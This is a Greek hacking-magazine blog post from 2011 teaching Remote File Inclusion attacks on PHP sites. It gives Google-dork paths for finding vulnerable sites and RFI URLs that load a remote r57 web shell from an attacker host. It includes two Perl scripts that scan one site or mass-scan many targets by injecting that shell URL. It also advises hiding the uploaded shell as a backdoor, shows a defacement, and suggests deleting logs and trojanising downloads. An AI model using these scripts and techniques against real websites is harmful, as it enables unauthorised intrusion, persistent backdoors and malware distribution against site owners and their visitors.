RSS

Αυτοματοποιείστε τις επιθέσεις σας!

25 Aug

Στο παρόν άρθρο θα δούμε βήμα – βήμα πως κάποιος ,εκμεταλλευόμενος ένα κενό ασφαλείας, θα μπορούσε να αποκτήσει μή εξουσιοδοτημένη πρόσβαση και στη συνέχεια να γράψει τα δικά του εργαλεία αυτόματου έλεγχου για το συγκεκριμένο κενό ασφαλείας. Όχι, κάτι τέτοιο δεν είναι και δύσκολο, μην τρομάζετε. Θα πείτε, “έχουμε ξανά ακούσει σχετικά με το Remote File Inclusion”. Ναι, αλλά δεν χάνουμε τίποτα να πούμε λίγα λόγια (εισαγωγικά) ώστε να μάθουν, όσοι δεν το έχουν ξανά ακούσει ή δεν έτυχε να ασχοληθούν και φυσικά να το εμπεδώσουν για τα καλά όσοι το έχουν ξανακούσει.



Η επίθεση RFI* (Remote File Inclusion), δίνει την δυνατότητα στον επιτιθέμενο να συμπεριλάβει ότι κώδικα θέλει στην URL του website. Όταν γίνει κάτι τέτοιο, ένας κακόβουλος επισκέπτης, μπορεί να εκτελέσει στην URL του site οτιδήποτε θα μπορούσε να το βλάψει.. για παράδειγμα ένα shell**.


* Τι είναι το RFI; Μια επίθεση τύπου RFI (Remote File Inclusion) με απλά λόγια, επιτρέπει σε έναν μη εξουσιοδοτημένο χρήστη, (ας πούμε έναν επισκέπτη) ενός διαδικτύου χώρου να εκτελεί τον δικό του κώδικα PHP (ως επί το πλείστον κακόβουλο) στο website που πάσχει απ’ το συγκεκριμένο κενό ασφαλείας.

** Τι είναι ένα Shell; Shell (ή WebShell) είναι μια σελίδα γραμμένη σε php ,asp (γενικά Dynamic Pages) κτλ. η οποία δίνει την δυνατότητα στον επιτιθέμενο να “δει” τα περιεχόμενα των φακέλων του site, να κάνει add, edit, delete, upload κτλ. Και με λίγο ψάξιμο μπορεί να μετατραπεί από εισβολέας .. σε ADMINISTRATOR!

Που οφείλετε το κενό ασφαλείας;

Το πρόβλημα μπορεί να βρίσκετε εδώ:

include($page . '.php');

Στο παράδειγμα μας, η include () δέχεται αβίαστα οποιαδήποτε .php εσωτερική ή .. εξωτερική🙂 .
Δηλαδή μπορεί το site μας να έχει σχεδιαστεί ώστε να είναι έτσι:


http://www.site.gr/index.php?page=example.php

Αλλά λόγο του προ αναφερθέντος προβλήματος, ένας κακοπροαίρετος χρήστης θα μπορούσε να εισάγει στην θέση του “example.php” την URL ενός δικού του site που μέσα σε αυτό να έχει σηκώσει (με το συμπάθιο) το Shellάκι του. H include () θα “νομίζει” ότι πρόκειται για δικό της, εσωτερικό αρχείο, άρα ασφαλές και voila!

http://www.site.gr/index.php?page=http://www.eimai_polu_kakos.gr/shells/shell.php

Όταν ένας επιτιθέμενος ανεβάζει ένα shell κάπου, το μετονομάζει σε *.*txt ώστε να μην εκτελεστεί στον server που το φιλοξενεί.

http://www.site.gr/index.php?page=http://www.eimai_polu_kakos.gr/shells/shell.txt?

Τέλος με την θεωρία, καιρός για λίγη δράση. Σίγουρα υπάρχουν πολλοί τρόποι για να βρούμε αν ένα site έχει πρόβλημα ασφαλείας σε επιθέσεις RFI και μετά να το εκμεταλλευτούμε, αλλά ας πάρουμε τα βήματα με τη σειρά.

Βήμα 1ο
Το πρώτο πράγμα που έχουμε να κάνουμε είναι να ανεβάσουμε σε ένα δικό μας site κάποιο shellaki και να περιμένουμε να βρούμε ένα site για να εξαπολύσουμε την επίθεση μας. Στην εικόνα 1 βλέπουμε ένα shell που έχουμε ανεβάσει σε κάποιον “Χ” server! Αν πάλι, δεν έχετε κάποιο server πρόχειρο (λογικό ακούγεται), μπορείτε να βρείτε ένα Free Host και να ανεβάσετε εκεί το shellaki σας..Με μια αναζήτηση στο Google για Free Hosts θα πάρετε πάααρα πολλά αποτελέσματα..!

Εικόνα 1
Το shellaki που ανεβάσαμε στο server, περιμένει υπομονετικά και αθόρυβα να αναλάβει τον βρώμικο ρόλο του.

Βήμα 2ο (Προαιρετικό)
Σειρά έχει η αναζήτηση για vulnerbale sites που να επιτρέπουν την συγκεκριμένη επίθεση. Το εργαλείο μας (άλλη μια φορά) θα είναι η μηχανή αναζήτησης Google. Πάνω στα κριτήρια αναζήτησης υπάρχουν χιλιάδες είδη σελίδων τα οποία μπορούμε να ψάξουμε, και το τι θα ακολουθεί μετά το “?” έχει να κάνει πιο πολύ με την φαντασία του προγραμματιστή που έχει σχεδιάσει την κάθε σελίδα. Μερικά είναι τα ακόλουθα:

/sources/functions.php?CONFIG[main_path]=
/sources/template.php?CONFIG[main_path]=
/embed/day.php?path=
/includes/dbal.php?eqdkp_root_path=
/sources/join.php?FORM[url]=owned&CONFIG[captcha]=1&CONFIG[path]=
/includes/kb_constants.php?module_root_path=
/mcf.php?content=
/components/com_facileforms/facileforms.frame.php?ff_compath=
skins/advanced/advanced1.php?pluginpath[0]=
/zipndownload.php?PP_PATH=
/administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=
/components/com_zoom/includes/database.php?mosConfig_absolute_path=
/main.php?sayfa=
/indexmain.php?page=
/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=
/addpost_newpoll.php?addpoll=preview&thispath=
/header.php?abspath=
/components/com_performs/performs.php?mosConfig_absolute_path=
/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=
/impex/ImpExData.php?systempath=
/modules/vwar/admin/admin.php?vwar_root=
/coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]=
/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=
/tools/send_reminders.php?includedir= allinurl:day.php?date=
/skin/zero_vote/error.php?dir=
/modules/TotalCalendar/about.php?inc_dir=
index.php?page=
/tags.php?BBCodeFile=
index.php?pageurl=
/templates/headline_temp.php?nst_inc=

Σημείωση: Αν ψάξετε για vulnerbale sites μέσω του Google μην ξεχάσετε το “allinurl:” μπροστά ώστε ο έλεγχος να γίνει σωστά!

Να πούμε ότι στο συγκεκριμένο άρθρο δεν θα ψάξουμε να βρούμε ένα τυχαίο site ώστε να του κάνουμε επίθεση για να καταλάβουμε πως δουλεύει η εν’ λόγο διαδικασία. Έχουμε βάλει απ’ την αρχή “στο μάτι” ένα site και θα δούμε πως θα του κάνουμε πρώτα τον απαραίτητο έλεγχο για να διαπιστώσουμε αν όντως είναι ευάλωτο σε RFI και μετά θα εξαπολύσουμε την επίθεση μας. Γι αυτό το λόγο άλλωστε, θέσαμε το 2ο βήμα ως “Προαιρετικό”.

Βήμα 3ο
Ένας τρόπος για να ελέγξουμε αν ένα site είναι ευάλωτο σε επιθέσεις RFI είναι o εξής:
Έστω ότι έχουμε το site http://www.site.gr/index.php?page=example.php και αντικαταστήσουμε τη σελίδα “example.php“με την διεύθυνση του server , που έχουμε ανεβάσαμε το shell μας, όπως αναφέραμε στο βήμα 1.

Αν το αποτέλεσμα είναι παρόμοιο με την εικόνα 2, τότε είμαστε σε πολύ καλό δρόμο, (αφού το site έχει όντος πρόβλημα), και παίρνουμε μάτι απ’ όλα τα περιεχόμενα, και μάλιστα με πολλές “γαργαλιστικές” επιλογές στη διάθεση μας όπως: Read, Write, Execute Command Upload, Download, Edit, Delete …και πολλά άλλα.

Εικόνα 2
Όπως μπορεί να διαπιστώσει ο καθένας, το συγκεκριμένο site έχει σοβαρό πρόβλημα και χάρη στο shellaki μας, βλέπουμε όλα του τα περιεχόμενα!

Άλλα, αντί να κάνουμε όλη αυτή τη διαδικασία χειρωνακτικά, μπορούμε να γράψουμε έναν κώδικα (σε perl) ο οποίος να ψάχνει για εμάς, αν ένα site είναι ευπαθές σε επίθεση τύπου RFI.

Κώδικας “single_rfi.pl”

#!/usr/bin/perl
use LWP::UserAgent;
use HTTP::Request;
print "\n(c) totalXaker magazine \n";
print "Simple RFI Vulnerability Scanner [mr.pr0n]\n";
print "Host: ";
print "[Ex: www.xxx.org ]:";
chop ($host = );
$host = "http://".$host if ($host !~ /^http:/);
print "Enter path:";
print "[Ex: xxx.php?xxx= ]:";
chop ($path = );
print "Shell: ";
print "[Ex: http://www.xxx.gr/xxxx/r57.txt? ]:";
chop ($shell = );
print "String: ";
print "[Ex: r57shell ]:";
chop ($string = );
{
        $rfi=$host."/".$path.$shell;
        $req=HTTP::Request->new(GET=>$rfi);
        $useragent=LWP::UserAgent->new();
        $response=$useragent->request($req);
        ($response->is_success)
        {
                if( $response->content =~ /$string/)
                {
                        print "$host ,is HACKABLE : D \n";
                        print "-------------------------------------------------\n";
                        print "$rfi\n";
                        print "-------------------------------------------------\n";
                }
                else
                {
                        print "Maybe $host is not Vulnerable!:( \n";
                }
        }
}

Γραμμές 1-3
Σε αυτές τι γραμμές και συγκεκριμένα 2,3 γίνετε δήλωση των packages που θα χρησιμοποιήσουμε στην συνέχεια. Για παράδειγμα το LWP:: UserAgent είναι μια ανήκει στην κατηγορία packages που έχουν να κάνουν με το User Agent (όπως λέει και το όνομα του) και χρησιμοποιούνται περισσότερο για να αποστέλλουν τα αιτήματα στο Web. Όπως επίσης και το HTTP::Request για τα “αιτήματα” http που θα κάνει το προγραμματακι μας.

Γραμμές 4-19
Οι γραμμές 4,5 περιέχουν την ονομασία του προγράμματος. Στις ακόλουθες γραμμές εισάγονται ένα ένα τα στοιχεία που θα χρησιμοποιηθούν μετά απ’ το πρόγραμμα, και τα οποία είναι, η μεταβλητή $host όπου εκεί εισάγετε το όνομα του site http://www.site.gr μετά ακολουθεί η δήλωση της $path, η οποια μπορει να ειναι για παραδειγμα /index.php?page=

Αφού τα εισάγουμε αυτά, σειρά έχει να δηλώσουμε την μεταβλητή $shell που όπως “μαρτυράει” και το όνομα της, είναι η πλήρης διεύθυνση της σελίδας που έχουμε ανεβάσει το shell μας
http://www.eimai_polu_kakos.gr/shells/shell.txt?.

Τέλος, σειρά έχει η μεταβλητή $string η οποία “ψαχουλεύει” στην σελίδα που της δώσαμε ($host) για την λέξη που δηλώσαμε, για παράδειγμα αν χρησιμοποιούμε το shell “r57.txt” (όπως κάνω εγώ στο παράδειγμα) θα το βάλουμε να ψάξει την λέξη “r57shell” που είναι και ο τίτλος του shell.

Γραμμές 20-25
H μεταβλητή θα είναι η $rfi=$host.”/”.$path.$shell η οποια θα περιεχει ολα τα στοιχεια που είχαμε εισάγει στα προηγούμενα βήματα. Στις ακόλουθες γραμμές 23-25 έχουμε την δημιουργία σύνδεσης καθώς και αναμονή για ανταπόκριση στο αίτημα ,πράγμα που δείχνει ότι το ενλόγο website είναι οντάς online!

Γραμμές 26-38
Όταν επιτευχθεί η σύνδεση και πάρουμε απάντηση (response) o κώδικας ψάχνει στα περιεχόμενα της σελίδας για την λέξη που έχουμε ορίσει ως $string. Αν γίνει αυτό τότε εμφανίζεται μήνυμα επιτυχίας..Αλλιώς δοκιμάζουμε κάτι διαφορετικό! Ας πάρουμε μια γεύση από μια εικονική εκτέλεση του προγράμματος:

(c) totalXaker magazine
Simple RFI Vulnerability Scanner [mr.pr0n]
Host: [Ex: http://www.xxx.org ]:http://www.site.gr
Enter path:[Ex: xxx.php?xxx= ]:/index.php?page=
Shell: [Ex: http://www.xxx.gr/shells/r57.txt?%5D:http://www.eimai_polu_kakos.gr/shells/r57.txt?
String: [Ex: r57shell ]:r57shell
http://www.site.gr,is HACKABLE! :D
-------------------------------------------------
http://www.site.gr/index.php?page=http://www.eimai_polu_kakos.gr/shells/r57.txt?
-------------------------------------------------

Όταν ολοκληρωθεί και εκτελεστεί, το πρόγραμμα μας θα έχει την παραπάνω μορφή. Τα αποτελέσματα του σκαναρισματος είναι εμφανέστατα στην εικόνα 3 όπου και είναι ο πραγματικός μας στόχος. Το site που έχουμε θέσει για σκαναρισμα είναι HACKABLE .. και τίποτα δεν μας σταματάει πλέων.


Εικόνα 3
Το μικρο μας πρόγραμμα εν ώρα.. λειτουργίας! Μπορεί να μην είναι αρκετά εφετζίδικο αλλά κάνει τη δουλειά του μια χαρά (ποιος είπε ότι η εμφάνιση παίζει ρόλο?) και μας μαρτυράει αν το αντίπαλο site .. έχει “προβληματάκια”!

Βήμα 4ο
Αφού το site που έχουμε στα χέρια μας έχει όντος πρόβλημα, μπορούμε μέσω του shell μας να ανεβάσουμε στην σελίδα-στόχο το ίδιο το shell.

Σημείωση: Όταν ανεβάζουμε shell σε ένα server καλό είναι να το “βάζουμε” μέσα σε ένα απομακρυνόμενο directory με ένα φαινομενικά αθώο όνομα, όπως για παράδειγμα “default_page.php”. Έτσι θα μπορούμε να έχουμε ανά πάσα ώρα και στιγμή access στο site απ’ την “πίσω πόρτα”, και ας διορθώσει ο administrator το κενό ασφαλείας🙂. Μόλις ολοκληρωθεί η διαδικασία, το αποτέλεσμα θα είναι όπως στην εικόνα 4.

Εικόνα 4
Μόλις ανεβάσαμε στον server το shell μας και είμαστε περήφανοι γι’ αυτό! Δεν ξέρω  ο administrator του site, πόσο υπερήφανος μπορεί να νιώσει για τη συγκεκριμένη αδυναμία του site.

Και τώρα είμαστε μέσα! Όχι Αdministrators (uid=99(nobody)) αλλά είμαστε μέσα. Στο σημείο που βρισκόμαστε μπορούμε να κάνουμε Defacement στο site το οποίο όπως καταλάβατε δεν είναι και κάτι το τόσο σπουδαίο ή κάτι δύσκολο.

Εννοείτε ΦΥΣΙΚΑ ότι δεν παρακινώ κανέναν αναγνώστη να προβεί σε τέτοιες ενέργειες αφού το defacement δεν είναι ένδειξη ανωτερότητας, υπεροχής και γνώσης αλλά περισσότερο για να κάνει κάποιος “μόστρα” και να αποδείξει, ότι πήρε πρόσβαση στο site!

Σημείωση: To Defacement έγινε μόνο και μόνο για τις ανάγκες του άρθρου και όταν πάρθηκε η φωτογραφία (screenshot) η αρχική σελίδα επανήλθε στην κανονική της μορφή και ο διαδικτυακός τόπος στην πρωταρχική του λειτουργία του!


Εικόνα 5
Ένα Χριστουγεννιάτικο Defacement!
Oh, jingle bells, jingle bells Jingle all the way!!

Βήμα 5ο
Τώρα το κατά πόσο θα το προχωρήσει κάποιος το θέμα της εισβολής έχει να κάνει με την όρεξη του να ασχοληθεί, την ηθική του, τις γνώσεις του και την φαντασία του.

Παραδείγματα:

  • Μπορεί να κάνει ένα ΠΑΝΕΥΚΟΛΟ Defacement (με την επιλογή upload του shell) ή ακόμα και να καταστρέψει όλη τη δουλειά του Administrator, κάνοντας delete τα παντα. (τακτική ενός Script Kiddie).
  • Μπορεί να rootάρει το server και στη συνέχεια, να σβήσει το shellaki που ανέβασε και τα logs του μεσα από μέσα, ώστε ποτέ και κανένας μα μην μάθει για αυτήν την επίθεση (τακτική ενός Cracker που ξέρει την δουλειά του).
  • Τέλος κάτι αρκετά κακό θα ήταν σε περίπτωση που το site έχει να κάνει με downloads αρχείων και προγραμμάτων, να “περάσει” μέσα σε μερικά γνωστά και “καθαρά” προγράμματα κάποιο backdoor και να γεμίσει με αυτόν τον τρόπο το internet με zobbies (τακτική ενός απατεώνα που σκοπό του έχει το εύκολο κέρδος σε βάρος άλλων).

Είπαμε, το πως θα συνεχίσει ο καθένας την επίθεση είναι καθαρά δικό του θέμα. Εμείς μερικά παραδείγματα δώσαμε!

Show must go on!
Αφού ολοκληρώσαμε το στόχο μας και και αποκτήσαμε πρόσβαση στον server που είχαμε βάλει στο μάτι, δεν νομίζουμε ότι θα θέλετε να το αφήσουμε εδώ. Λέμε, τώρα που ζεσταθήκαμε και καταλάβαμε 100% τι εστι RFI και πόσο επικίνδυνο είναι, να γράψουμε ένα προγραμματακι το οποίο θα “παίρνει” μια λίστα από sites (sites.txt) και μια λίστα από πιθανά Vulnerable Directories (dirs.txt) και να κάνει έλεγχο (εντελώς αυτοματοποιημένο) όλων των sites με όλα τα πιθανά Directrories. Δύσκολο να γινόταν κάτι τέτοιο με το .. χέρι! Μπορεί να ακούγεται πολύπλοκο αλλά δεν είναι και τόσο…

Κώδικας mass_rfi.pl

#!/usr/bin/perl

use HTTP::Request;
use LWP::UserAgent;

print "\n(c) totalXaker magazine \n";
print "Blind Mass RFI Vulnerability Scanner [mr.pr0n]\n";
print "Shell: ";
print "[Ex: http://www.xxx.gr/shells/r57.txt ]:";
chop ($shell = );
print "String: ";
print "[Ex: r57shell ]:";
chop ($string = );
$sites="sites.txt";
$words="dirs.txt";
print " [*]Tryin' to open wordlist... \n";
open (SITELIST, $sites);
print " [*]Sitelist opened successfully!\n";
open (WORDLIST, $words);
print " [*]Wordlist opened successfully!\n";
print "Scanning... [Please Wait!]\n";
@sitelist = ;
@wordlist = ;
for ($i = 0; $i < @sitelist; $i++)
{
        for ($j = 0; $j < @wordlist; $j++)         {                 $host = $sitelist[$i];                 chop ($host);                 $scan = $wordlist[$j];                 chop ($scan);                 $rfi=$host.$scan.$shell;                 $req=HTTP::Request->new(GET=>$rfi);
                $useragent=LWP::UserAgent->new();
                $response=$useragent->request($req);
                if ($response->is_success)
                {
                        if( $response->content =~ /$string/)
                        {
                                open(APOTELESMATA,">>apotelesmata.txt");
                                print APOTELESMATA "$rfi\n";
                                close(APOTELESMATA);
                                print " [*]Results:\n";
                                print "$rfi\n";
                        }
                }
        }
}

Γραμμές 1-5
Σε αυτές τι γραμμές 2,3 γίνετε όπως και πριν γίνεται δήλωση των modules που θα χρησιμοποιήσουμε στην συνέχεια. Του LWP:: UserAgent και του HTTP::Request. Για το τι κάνει το καθένα το αναφέραμε παραπάνω (στον κώδικα single_rfi.pl).

Γραμμές 6-13
Οι γραμμές αυτές περιέχουν τα στοιχεία του προγράμματος καθώς και τις μεταβλητές $shell και $string που εισάγει ο χρήστης. Η $shell θα περιέχει την ακριβή διεύθυνση του server που έχουμε το shellaki ενώ, η $string θα περιέχει μια λέξη η οποία είναι χαρακτηριστική για το shell και θα την αναζητήσει ο κώδικας στη σελίδα που θα ορίσουμε!

Γραμμές 14-21
Ακολουθούν άλλες δυο μεταβλητές τις οποίες έχουμε δηλώσει απ’ την αρχή εσωτερικά στο πρόγραμμα (βέβαια μπορούν να ρυθμιστούν να δίνονται τα στοιχεία και απ’ τον χρήστη). Η μεταβλητή $sites περιέχει τη λίστα με τα sites που θα θέσουμε για scannarisma και είναι το αρχείο sites.txt ενώ η μεταβλητή $dirs τα directories που έχουμε διαθέσιμα και είναι το αρχείο dirs.txt.

Γραμμές 22-30
Δηλώνονται οι δυο λίστες ως πίνακες και μετά ανοίγουν δυο for () loops η μια μέσα στην άλλη, όπου στην πρώτη όσο ο μετρητής $i είναι μικρότερος απ’ τον αριθμό του στοιχείου που ελέγχει,”μπαίνει” την δεύτερη for ,όπου αν ισχύει η παραπάνω συνθήκη, τότε το στοιχείο της @sitelist λίστας θα γίνει η μεταβλητή $host και θα κρατηθεί στη μνήμη. Σειρά έχει η @wordlist η οποία, κρατηθεί επίσης στην μνήμη ως $scan. Η μεταβλητή $rfi θα πάρει τα στοιχεία με την μορφή $host.$scan.$shell.

Γραμμές 30-48
Στις ακόλουθες γραμμές έχουμε την δημιουργία σύνδεσης και αναμονή για ανταπόκριση στο αίτημα για σύνδεση,αν πάρουμε “απάντηση” τότε το site είναι online. !Όταν επιτευχθεί η σύνδεση και πάρουμε απάντηση (response) o κώδικας ψάχνει στα περιεχόμενα της σελίδας για την λέξη που έχουμε ορίσει ως $string. Αν γίνει αυτό τότε δημιουργείτε ένα αρχείο με το όνομα apotelesmata.txt στο active directory που βρισκόμαστε, με τα αποτελέσματα του scannarismatos AN υπάρχουν, και ακολουθούν τα αποτελέσματα που είχαμε στο τερματικό μας. H διαδικασία αυτή θα κρατήσει, όσο υπάρχουν στοιχεία στην “@wordlist“. Όταν τελειώσουν θα βγει απ’ την επανάληψη, ο μετρητής της 1ης for () ο “$i” θα μεγαλώσει κατά ένα .. και πάλι τα ίδια μέχρι να τελειώσουν και όλα τα στοιχεία της”@sitelist“.

Πριν εκτελέσουμε το ρπόγραμμα μας, καλό είναι να πούμε ότι για το παράδειγμα θα κάνουμε χρήση 3 site στο (sites.txt) και άλλων 30 directories (dirs.txt).

sites.txt:

http://www.hack.co.uk
http://www.site.gr
http://www.test123.gr

dirs.txt

/sources/functions.php?CONFIG[main_path]=
/sources/template.php?CONFIG[main_path]=
/embed/day.php?path=
/includes/dbal.php?eqdkp_root_path=
/sources/join.php?FORM[url]=owned&CONFIG[captcha]=1&CONFIG[path]=
/includes/kb_constants.php?module_root_path=
/mcf.php?content=
/components/com_facileforms/facileforms.frame.php?ff_compath=
skins/advanced/advanced1.php?pluginpath[0]=
/zipndownload.php?PP_PATH=
/administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=
/components/com_zoom/includes/database.php?mosConfig_absolute_path=
/main.php?sayfa=
/indexmain.php?page=
/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=
/addpost_newpoll.php?addpoll=preview&thispath=
/header.php?abspath=
/components/com_performs/performs.php?mosConfig_absolute_path=
/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=
/impex/ImpExData.php?systempath=
/modules/vwar/admin/admin.php?vwar_root=
/coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]=
/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=
/tools/send_reminders.php?includedir= allinurl:day.php?date=
/skin/zero_vote/error.php?dir=
/modules/TotalCalendar/about.php?inc_dir=
index.php?page=
/tags.php?BBCodeFile=
index.php?pageurl=
/templates/headline_temp.php?nst_inc=

Εκτέλεση του προγράμματος:

(c) totalXaker magazine
Blind Mass RFI Vulnerability Scanner [mr.pr0n]
Shell: [Ex: http://www.xxx.gr/shells/r57.txt?%5D:http://www.eimai_polu_kakos.gr/shells/r57.txt?
String: [Ex: r57shell ]:r57shell
[*]Tryin' to open wordlist...
[*]Sitelist opened successfully!
[*]Wordlist opened successfully!
Scanning... [Please Wait!]
[*]Results:
http://www.site.gr/index.php?page=http://www.eimai_polu_kakos.gr/shells/r57.txt?

Έτσι είναι η θεωρητική μορφή του προγράμματος σε λειτουργία..για να το δούμε σε δράση, δεν έχουμε παρά να κοιτάξουμε την εικόνα 6!.

Εικόνα 6
To προγραμματακι μας βρήκε ένα θύμα … και μάλιστα με τα λίγα αυτά directrories!


Συμπεράσματα επιλόγου

Σίγουρα υπάρχουν πολλοί τρόποι που κάποιος θα μπορούσε να κάνει επιθέσεις με την συγκεκριμένη τεχνική και σίγουρα δεν μπορούν να αναφερθούν όλοι σε ένα άρθρο όσο και αν το θέλαμε..Το μόνο που μπορούμε να κάνουμε είναι να σας ενημερώνουμε για ότι καινούριο κυκλοφορεί … ανά τακτά χρονικά διαστήματα! Αυτό που πρέπει να καταλάβει ο κάθε αναγνώστης είναι ότι το να προκαλείς καταστροφή σε ένα σύστημα με ένα κενό ασφαλείας που βρήκες δεν αποτελεί ένδειξη γνώσης και υπέροχης απέναντι στον Administrator του “αντίπαλου” συστήματος.. το να γράφεις όμως δικό σου κώδικα (απ’ το μηδέν) για να εκμεταλλεύεσαι το συγκεκριμένο κενό που ξετρύπωσες αποτελεί σίγουρα ένδειξη γνώσης και εμπειρίας.

 
Leave a comment

Posted by on August 25, 2011 in It's Greek to Me

 

Tags: , ,

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

 
%d bloggers like this: